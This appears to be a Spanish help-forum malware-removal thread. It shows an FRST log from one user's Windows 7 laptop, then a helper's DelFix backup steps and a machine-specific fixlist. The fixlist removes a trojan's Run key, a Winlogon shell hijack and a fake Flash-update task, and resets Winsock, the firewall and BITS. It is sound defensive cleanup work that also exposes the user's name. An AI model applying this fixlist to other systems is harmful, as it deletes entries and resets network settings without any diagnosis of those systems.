MSCONFIG\startupreg: IDMan => C:\Program Files (x86)\Internet Download Manager\IDMan.exe /onboot
MSCONFIG\startupreg: movavi_videoconverter_agent => "C:\Users\MARCO AVILA\AppData\Roaming\Movavi Video Converter 19 Premium\ConverterAgent.exe"
MSCONFIG\startupreg: mwlDaemon => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe
MSCONFIG\startupreg: PDF7 Registry Controller => C:\Program Files (x86)\Nuance\PDF Professional 7\RegistryController.exe
MSCONFIG\startupreg: PDFHook => C:\Program Files (x86)\Nuance\PDF Professional 7\pdfpro7hook.exe
MSCONFIG\startupreg: PDVD8LanguageShortcut => "c:\Program Files (x86)\CyberLink\PowerDVD8\Language\Language.exe"
MSCONFIG\startupreg: PWRISOVM.EXE => C:\Program Files (x86)\PowerISO\PWRISOVM.EXE
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RemoteControl8 => "c:\Program Files (x86)\CyberLink\PowerDVD8\PDVD8Serv.exe"
MSCONFIG\startupreg: SmileboxTray => "C:\Users\MARCO AVILA\AppData\Roaming\Smilebox\SmileboxTray.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: swg => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: UVS10 Preload => C:\Program Files (x86)\Ulead Systems\Ulead VideoStudio SE DVD\uvPL.exe

==================== Reglas de firewall (Lista blanca) ================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

FirewallRules: [TCP Query User{366F23B0-A93E-4D27-B27D-4C35A39332F0}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [UDP Query User{773046CB-4887-40F8-98FF-F54E014350F5}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [TCP Query User{AF830F9F-477D-4255-97FE-0EF0EE55F200}C:\program files (x86)\windows live\messenger\msnmsgr.exe] => (Allow) C:\program files (x86)\windows live\messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{C917BBB9-BA08-4078-8791-8322937FFD69}C:\program files (x86)\windows live\messenger\msnmsgr.exe] => (Allow) C:\program files (x86)\windows live\messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{82E9CFC6-B7F1-4B31-BE71-99752572EEDA}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{79697472-7464-49E5-9290-00A065F43C82}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{E9602492-F37B-4240-89B7-0C70ADE2AA71}] => (Allow) LPort=2869
FirewallRules: [{CFA1B78C-0293-4EC5-83D9-62BEDDB4D8B1}] => (Allow) LPort=1900
FirewallRules: [{67173E6A-BAA6-439D-AB77-C2FE749C1E33}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{BFE4D6F8-9081-4A1C-9456-3D756F608CED}] => (Allow) LPort=2869
FirewallRules: [{D43C1EF5-D2E0-475D-8975-343493D398E5}] => (Allow) LPort=1900
FirewallRules: [{26F2DF09-DEDA-4C43-8887-69F78A6F9CB0}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{0A9103B6-E567-48CD-ABA1-3EB2A1C6A7AB}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [UDP Query User{204D78B9-4BE4-417F-AB44-1EFB9AB5F18E}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe (Ares Development Group) [Archivo no firmado]
FirewallRules: [{F27355F9-E64C-42A5-8A0E-CEB5F9244A6F}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe (Hewlett-Packard Company -> Hewlett-Packard)
FirewallRules: [{547421D3-D7AA-491A-9433-45EFB8C8A9C2}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{CBF6769F-1DE4-4E7C-8354-72141872CBFF}] => (Allow) LPort=1542
FirewallRules: [{3A8FA1B7-0C8D-4CBD-9DF7-CDFA95A258FE}] => (Allow) LPort=1542
FirewallRules: [{2D4648E6-3E13-4A06-B05F-FC1576F10700}] => (Allow) LPort=53
FirewallRules: [{4513D140-DC13-4D7D-A936-C1D35415CD84}] => (Allow) LPort=1542
FirewallRules: [{327D53F6-CA13-48CE-B0B3-467850291634}] => (Allow) LPort=1542
FirewallRules: [{E8584AE4-943A-4762-AE3C-8600F07B0540}] => (Allow) LPort=53
FirewallRules: [{3B898225-EBA1-4B29-83E8-3344D84E1C64}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{95BDBC3E-EA4E-4D1A-B014-314290E4C259}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{CFC593AB-A208-4022-A242-A49F41139E65}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{5CF3FFBD-64A8-48B9-A708-3E45719BDF50}] => (Allow) LPort=1688
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\FlashGet Network\FlashGet 3\FlashGet3.exe] => Enabled:Flashget3

==================== Puntos de Restauración =========================

27-03-2020 19:23:20 AdwCleaner_BeforeCleaning_27/03/2020_19:23:20
27-03-2020 19:33:19 JRT Pre-Junkware Removal

==================== Dispositivos defectuosos en el Administrador de dispositivos ============

Name: Synaptics PS/2 Port TouchPad
Description: Synaptics PS/2 Port TouchPad
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Synaptics
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: ExpressVPN TAP Adapter
Description: ExpressVPN TAP Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: ExpressVPN
Service: tapexpressvpn
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Errores del registro de eventos: ========================

Errores de aplicación:
==================
Error: (03/27/2020 07:26:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: nlsvc.exe, versión: 3.0.0.11, marca de tiempo: 0x4d876c73
Nombre del módulo con errores: ntdll.dll, versión: 6.1.7601.23539, marca de tiempo: 0x57c99b8f
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0000000000048d84
Id. del proceso con errores: 0xa34
Hora de inicio de la aplicación con errores: 0x01d6049fe11caf73
Ruta de acceso de la aplicación con errores: C:\Program Files\NetLimiter 3\nlsvc.exe
Ruta de acceso del módulo con errores: C:\Windows\SYSTEM32\ntdll.dll
Id. del informe: 2acf50be-7093-11ea-88b4-00262d6f27b2

Error: (03/27/2020 07:12:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: nlsvc.exe, versión: 3.0.0.11, marca de tiempo: 0x4d876c73
Nombre del módulo con errores: ntdll.dll, versión: 6.1.7601.23539, marca de tiempo: 0x57c99b8f
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0000000000048d84
Id. del proceso con errores: 0x8d8
Hora de inicio de la aplicación con errores: 0x01d6049dd476ce26
Ruta de acceso de la aplicación con errores: C:\Program Files\NetLimiter 3\nlsvc.exe
Ruta de acceso del módulo con errores: C:\Windows\SYSTEM32\ntdll.dll
Id. del informe: 20301c7a-7091-11ea-a8d6-00262d6f27b2

Error: (03/27/2020 06:14:04 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa firefox.exe, versión 74.0.0.7373, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, compruebe el historial de problemas en el panel de control Centro de actividades.

Identificador de proceso: 1590

Hora de inicio: 01d60495a24e8304

Hora de finalización: 5587

Ruta de acceso de la aplicación: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

Identificador de informe: feccd185-7088-11ea-81a8-00262d6f27b2

Error: (03/27/2020 05:55:50 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Error al generar el contexto de activación para "C:\Users\MARCO AVILA\AppData\Local\chromium\Application\chrome.exe".
No se encontró el ensamblado dependiente 58.0.2988.0,language="&#x2a;",type="win32",version="58.0.2988.0".
Use sxstrace.exe para obtener un diagnóstico detallado.

Error: (03/27/2020 05:54:49 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Error al generar el contexto de activación para "c:\Users\marco avila\documents\escritorio\programas\antivirus\esetsmartinstaller_esn.exe". Error en el archivo de manifiesto o directiva "" en la línea .
Una versión de componente requerida por la aplicación está en conflicto con la versión de otro componente activo.
Los componentes en conflicto son:.
Componente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest.
Componente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest.

Error: (03/27/2020 05:22:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: nlsvc.exe, versión: 3.0.0.11, marca de tiempo: 0x4d876c73
Nombre del módulo con errores: ntdll.dll, versión: 6.1.7601.23539, marca de tiempo: 0x57c99b8f
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0000000000048d84
Id. del proceso con errores: 0x820
Hora de inicio de la aplicación con errores: 0x01d6048e84a9d9b6
Ruta de acceso de la aplicación con errores: C:\Program Files\NetLimiter 3\nlsvc.exe
Ruta de acceso del módulo con errores: C:\Windows\SYSTEM32\ntdll.dll
Id. del informe: cdc39424-7081-11ea-81a8-00262d6f27b2

Error: (03/27/2020 05:18:20 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 512) (User: )
Description: Los Servicios de cifrado no pudieron inicializar el objeto "System Writer" de la copia de seguridad de VSS.

Details:
Could not query the status of the EventSystem service.

System Error:
Se está cerrando el sistema.
.

Error: (03/27/2020 05:00:49 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: No se pudo crear el punto de restauración (proceso = C:\Program Files\VS Revo Group\Revo Uninstaller\RevoUnin.exe Files\VS Revo Group\Revo Uninstaller\RevoUnin.exe" ; descripción = Revo Uninstaller's restore point - Malwarebytes version 4.1.0.56; error = 0x8007043c).


Errores del sistema:
=============
Error: (03/27/2020 07:32:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio MBAMChameleon no pudo iniciarse debido al siguiente error: 
El sistema no puede encontrar el archivo especificado.

Error: (03/27/2020 07:32:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio MBAMChameleon no pudo iniciarse debido al siguiente error: 
El sistema no puede encontrar el archivo especificado.

Error: (03/27/2020 07:30:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mvd21 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/27/2020 07:30:08 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.

Error: (03/27/2020 07:30:00 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio MBAMChameleon no pudo iniciarse debido al siguiente error: 
El sistema no puede encontrar el archivo especificado.

Error: (03/27/2020 07:30:00 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mvd21 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/27/2020 07:30:00 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.

Error: (03/27/2020 07:29:56 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio MBAMChameleon no pudo iniciarse debido al siguiente error: 
El sistema no puede encontrar el archivo especificado.


Windows Defender:
===================================
Date: 2015-03-24 06:23:24.821
Description: 
El examen de Windows Defender se detuvo antes de completarse.
Id. de examen:{C4B00BA7-6BCC-412D-890A-A12E0BF6C8FF}
Tipo de examen:AntiSpyware
Parámetros de examen:Examen rápido
Usuario:NT AUTHORITY\Servicio de red

Date: 2015-03-03 06:00:49.092
Description: 
El examen de Windows Defender se detuvo antes de completarse.
Id. de examen:{A4A05D0B-9AFA-4E8F-9B47-13063FE90563}
Tipo de examen:AntiSpyware
Parámetros de examen:Examen rápido
Usuario:NT AUTHORITY\Servicio de red

Date: 2012-04-10 21:48:48.719
Description: 
Windows Defender detectó spyware u otro software potencialmente no deseado.
Para obtener más información, consulte lo siguiente:
http://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:Win32/Agent.gen!A&threatid=135442
Nombre:Backdoor:Win32/Agent.gen!A
Id.:135442
Gravedad:Grave
Categoría:Puerta trasera
Ruta de acceso encontrada:containerfile:C:\Users\MARCO AVILA\AppData\Local\Temp\Rar$EX00.881\SUPER 2008\SuperSetup.exe;file:C:\Users\MARCO AVILA\AppData\Local\Temp\Rar$EX00.881\SUPER 2008\SuperSetup.exe->(ZipSfx)->server.exe
Tipo de detección:Genérico
Origen de detección:Sistema
Estado:Desconocido
Usuario:NT AUTHORITY\SYSTEM
Nombre de proceso:

Date: 2010-07-04 23:15:31.293
Description: 
Windows Defender detectó spyware u otro software potencialmente no deseado.
Para obtener más información, consulte lo siguiente:
http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDownloader:Win32/Adload.BK&threatid=150859
Nombre:TrojanDownloader:Win32/Adload.BK
Id.:150859
Gravedad:Alta
Categoría:Descargador troyano
Ruta de acceso encontrada:containerfile:C:\Users\MARCO AVILA\Desktop\DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar;file:C:\Users\MARCO AVILA\Desktop\DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar->DAEMON Tools Pro Advanced 4.36.0309.0160\DAEMONToolsPro4360309-0160.exe->(nsis-1-$(ENVVAR)\restorepoint.exe);filelocalcopy:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{DAC796B3-EDCF-460E-8CCA-6B1011B99C04}-DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar;webfile:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{DAC796B3-EDCF-460E-8CCA-6B1011B99C04}-DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar|http://rs835tl3.rapidshare.com/files/403186699/1620412/DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar;webfile:C:\Users\MARCO AVILA\Desktop\DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar|http://rs835tl3.rapidshare.com/files/403186699/1620412/DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar
Tipo de detección:Concreto
Origen de detección:Descargas y datos adjuntos
Estado:Desconocido
Usuario:MARCOAVILA-PC\MARCO AVILA
Nombre de proceso:C:\Program Files (x86)\Internet Explorer\iexplore.exe

CodeIntegrity:
===================================

Date: 2020-03-27 19:30:08.742
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-27 19:30:08.398
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-27 19:30:00.068
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-27 19:29:59.787
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-27 19:29:56.932
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-27 19:29:56.667
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-27 19:29:52.939
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-27 19:29:52.611
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

==================== Información de la memoria =========================== 

BIOS: INSYDE V1.30 09/29/2009
Placa base: Acer Aspire 4810T
Procesador: Genuine Intel(R) CPU U4100 @ 1.30GHz
Porcentaje de memoria en uso: 88%
RAM física total: 3003.79 MB
RAM física disponible: 348.17 MB
Virtual total: 6005.76 MB
Virtual disponible: 3140.43 MB

==================== Unidades ================================

Drive c: (ACER) (Fixed) (Total:453.94 GB) (Free:98.18 GB) NTFS

\\?\Volume{5e7a9bc6-de7f-11de-9b61-806e6f6e6963}\ (SYSTEM RESERVED) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{5e7a9bc5-de7f-11de-9b61-806e6f6e6963}\ (PQSERVICE) (Fixed) (Total:11.72 GB) (Free:1.48 GB) NTFS

==================== MBR & Tabla de particiones ====================

==========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: BC3BBC3B)
Partition 1: (Not Active) - (Size=11.7 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=453.9 GB) - (Type=07 NTFS)

==================== Final de Addition.txt =======================

Bien… y ahora sigue estos pasos, :arrow_forward: MUY Importante :arrow_backward: Realiza una copia de seguridad del registro :

  • Para hacerlo descarga :arrow_forward: DelFix.exe(en tu escritorio).

  • Doble clic para ejecutarlo.(Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona -Ejecutar como Administrador-).

  • Atención, ahora marca/selecciona únicamente la casilla :white_check_mark: Create registry backup, las demás casillas NO. :face_with_monocle:

  • Pulsar en Run.

Se abrirá el informe (DelFix.txt), guárdalo por si fuera necesario y cierra la herramienta.

:warning: Con los demás programas cerrados ve a :arrow_forward: Inicio :arrow_forward: Ejecutar :arrow_forward: y escribe Notepad.exe.

  • Ahora debes copiar y pegar los códigos/líneas que están en el interior del recuadro de más abajo, dentro del Notepad.
START
CREATERESTOREPOINT:
CLOSEPROCESSES:
ContextMenuHandlers1: [Cover Designer] -> {73FCA462-9BD5-4065-A73F-A8E5F6904EF7} => -> Ningún archivo
AlternateDataStreams: C:\ProgramData\Temp:0574215C [120]
AlternateDataStreams: C:\ProgramData\Temp:D95ACC7D [135]
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [rm] => C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_8451.exe [3244032 2020-03-26] (Ggmyhirjho) [Archivo no firmado] <==== ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [24552064 2019-10-15] (Piriform Software Ltd -> Piriform Ltd)
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Winlogon: [Shell] explorer.exe, "C:\ProgramData\ErrorResponder\errorResponder.exe" <==== ATENCIÓN
HKLM\Software\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] ->
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.149\Installer\chrmstp.exe [2020-03-19] (Google LLC -> Google LLC)
ShortcutTarget: Acer VCM.lnk -> C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe (Ningún archivo)
GroupPolicy: Restricción ? <==== ATENCIÓN
Task: {044F4A48-321A-43AC-A9F6-F19F8D91B966} - System32\Tasks\Adobe Flash sdk Files Update up_2020326 => C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_9D4F.exe [3279360 2020-03-26] (Rfz) [Archivo no firmado] <==== ATENCIÓN
Task: {12AFE1A3-4413-46CF-91D7-57ED665810D6} - System32\Tasks\{24DB5AEF-77D6-4D21-A60D-FC51D1DE0800} => F:\DERIVE\Setup.exe
Task: {1D6C3AD0-820D-4CF9-BF65-62DD5CC0D487} - System32\Tasks\{CE0061C3-BB4E-4F9D-AE54-4C440ACD7DCB} => F:\soft\Setup.exe
Task: {2039C8D7-5F63-4C20-979C-C67488199856} - System32\Tasks\{A75F7D66-592A-4D97-ABFC-86C0BECA5C74} => F:\soft\Setup.exe
Task: {28324B50-233C-4D3B-9B94-B5A7A3162929} - System32\Tasks\{DE9A6B33-FA22-416A-A54F-A84670A2D085} => F:\driver\setup.exe
Task: {2E8ED139-72E6-483B-B20C-453CEF07EAC4} - \cfozyfozh -> Ningún archivo <==== ATENCIÓN
Task: {4692B3B5-1754-4087-8BB4-F28C35B8DB70} - System32\Tasks\{4DE22ECF-13B1-486E-A4BF-8E1A61B22195} => F:\DERIVE\Setup.exe
Task: {4FE45DF9-137F-4313-ADC2-C643B9F07A48} - System32\Tasks\{63606048-94AF-4BF5-8844-18B2029713AE} => F:\driver\setup.exe
Task: {7E78E065-237E-4109-BA80-217925760F0B} - System32\Tasks\{362B582C-452B-4BCE-9FDA-E3F3F8988AD7} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{F3D5ECF7-7AE4-4B53-8A7E-1F850D6AE6B4}\setup.exe" -c -runfromtemp -l0x0009 -removeonly
Task: {8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {8736786B-E568-46C9-8E25-B1FA90D746B9} - System32\Tasks\{2764DDF7-A8C2-4955-BB01-5162F65D6B11} => F:\DERIVE\Setup.exe
Task: {9082DDA6-859B-4932-93AC-BF5642AB6B3F} - System32\Tasks\{0394875D-2637-469D-9971-0B2FC6300FA0} => F:\DERIVE\Setup.exe
Task: {BD144ED7-700F-4835-9680-928B99A7387B} - System32\Tasks\{EB168395-2BF7-4FA0-A39B-4D3FC10D0E6E} => F:\driver\setup.exe
Task: {C680F459-75EB-4FB7-AA17-7797EB0915E4} - System32\Tasks\{F0737E83-4EB2-4475-B6D0-3055061A38A1} => F:\DERIVE\Setup.exe
Task: C:\Windows\Tasks\Adobe Flash sdk Files Update up_2020326.job => C:\Users\MARCOA~1\AppData\Local\Temp\~atmp\_9D4F.exe/check_update C:\Users\MARCO AVILA\AppData\Local\inetinfoserviceMARCO AVILA6This task detecct has update for sdk files.up <==== ATENCIÓN
SearchScopes: HKLM -> DefaultScope no se encuentra el valor
BHO: Sin Nombre -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Ningún archivo
Handler: WSISAllmytubechrome - Sin valor CLSID
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\MARCOA~1\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx <no encontrado>
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
CHR HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [fhjnbgadgmmffddcilnbmcieekimilcn] - <no Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - <no Path/update_url>
S2 Greg_Service; C:\Program Files (x86)\Acer\Registration\GregHSRW.exe [X]
S2 NTI IScheduleSvc; C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [X]
S3 NTIBackupSvc; C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\BackupSvc.exe [X]
S2 NTISchedulerSvc; C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe [X]
S2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [X]
S2 Updater Service; C:\Program Files\Acer\Acer Updater\UpdaterService.exe [X]
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Windows -> Microsoft Corporation) <==== ATENCIÓN (no ServiceDLL)
S3 cpuz137; \??\C:\Users\MARCOA~1\AppData\Local\Temp\cpuz137\cpuz137_x64.sys [X] <==== ATENCIÓN
S3 hfFilter; system32\drivers\hfFilter.sys [X]
S3 JakNDisMP; system32\DRIVERS\JakNDis.sys [X]
S2 MBAMChameleon; \SystemRoot\System32\Drivers\MbamChameleon.sys [X]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
2020-03-26 11:39 - 2020-03-26 11:46 - 000000000 ____D C:\ProgramData\SGZPftQsRObztM
2020-03-26 11:39 - 2020-03-26 11:45 - 000000000 ____D C:\ProgramData\pBjXawQUXRlgujtt
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\rkitjuoutqb
2020-03-27 19:23 - 2017-11-28 20:52 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\IObit
2020-03-27 19:23 - 2017-10-19 11:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2020-03-27 19:23 - 2015-06-23 19:22 - 000000000 ____D C:\Users\MARCO AVILA\AppData\LocalLow\IObit
2020-03-27 19:23 - 2015-06-23 19:20 - 000000000 ____D C:\ProgramData\IObit
HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END

